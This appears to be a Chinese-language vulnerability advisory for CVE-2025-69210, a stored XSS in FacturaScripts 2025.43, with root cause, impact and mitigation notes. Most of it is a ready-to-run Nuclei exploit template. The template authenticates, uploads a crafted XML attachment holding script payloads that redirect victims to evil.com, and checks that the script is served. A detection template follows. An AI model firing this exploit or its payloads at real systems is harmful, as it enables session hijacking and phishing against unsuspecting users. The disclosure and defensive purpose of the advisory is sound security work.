[webapps] FacturaScripts 2025.43 - XSS
CVE-2025-69210
FacturaScripts 2025.43 存在存储型XSS漏洞,攻击者可注入恶意脚本。
Medium · CVSS 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)📋 漏洞基础信息
| CVE | CVE-2025-69210 |
|---|---|
| 漏洞类型 | 跨站脚本攻击 (XSS) |
| 受影响版本 | FacturaScripts 2025.43 |
| 危害等级 | Medium · CVSS 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |
| 发布日期 | 2026-04-29 |
| 提交者 | VETTRIVEL U |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
应用未对用户可控的输入进行充分过滤和转义,直接输出到页面,导致恶意JavaScript代码被浏览器执行。原文未明确具体函数或参数,但属于通用XSS设计缺陷。
🎯 攻击场景
1. 攻击者向FacturaScripts应用提交包含恶意JavaScript代码的数据(例如在表单字段中)。2. 应用存储该数据并在后续页面中未加过滤地呈现。3. 受害者(管理员或普通用户)访问包含恶意代码的页面。4. 恶意代码在受害者浏览器中执行,可能窃取会话、执行操作等。成功标志:受害者的浏览器执行了攻击者注入的脚本。
💥 漏洞影响
攻击者可执行任意JavaScript代码,导致会话劫持、数据窃取、钓鱼攻击或篡改页面内容,但无法直接RCE或提权。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-69210-exploit
info:
name: FacturaScripts 2025.43 - Stored XSS Exploit
author: VETTRIVEL U
severity: medium
description: |
Authenticated stored XSS via product file upload. A crafted XML file containing JavaScript
is uploaded as a product attachment. When the file is accessed, JavaScript executes in the browser context.
reference:
- https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md
tags: facturascripts,xss,stored,authenticated
variables:
username: '{{username}}'
password: '{{password}}'
http:
- raw:
- |
POST /index.php?page=Login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&action=login
- |
GET /ListProducto HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'ListProducto'
part: body
extractors:
- type: regex
name: product_list_url
part: body
regex:
- '/EditProducto\?code=\d+'
- raw:
- |
POST /EditProducto?code=10 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPU65l8Am0L64rWdo
Cookie: {{cookie}}
------WebKitFormBoundaryPU65l8Am0L64rWdo
Content-Disposition: form-data; name="new-files[]"; filename="xss.xml"
Content-Type: text/xml
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) {
top.location.href = "https://evil.com";
}
</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) {
location.href = "https://evil.com";
}
</a:script>
<info>
<name>
<value>
<![CDATA[
<script>
alert("XSS");
if (confirm("Now Redirect POC")) {
window.location = "https://evil.com";
}
</script>
]]>
</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
------WebKitFormBoundaryPU65l8Am0L64rWdo--
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'OK'
part: body
- raw:
- |
GET /MyFiles/2025/12/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'alert("XSS")'
part: body🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-69210-detection
info:
name: FacturaScripts 2025.43 - XSS Detection
author: VETTRIVEL U
severity: medium
description: |
FacturaScripts versions up to 2025.43 are vulnerable to stored XSS via product file upload.
This template checks for the presence of vulnerable versions or the core file that handles file uploads.
reference:
- https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md
- https://github.com/advisories/GHSA-2267-xqcf-gw2m
tags: facturascripts,xss,stored
http:
- method: GET
path:
- '{{BaseURL}}/index.php'
- '{{BaseURL}}'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- 'FacturaScripts'
part: body
- type: regex
regex:
- '[0-9]+\.[0-9]+'
part: body
condition: or🛡️ 修复建议
升级至FacturaScripts最新安全版本。临时缓解措施:对所有用户输入进行HTML实体编码和输出转义,实施内容安全策略(CSP)。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:41 | 来源: Exploit-DB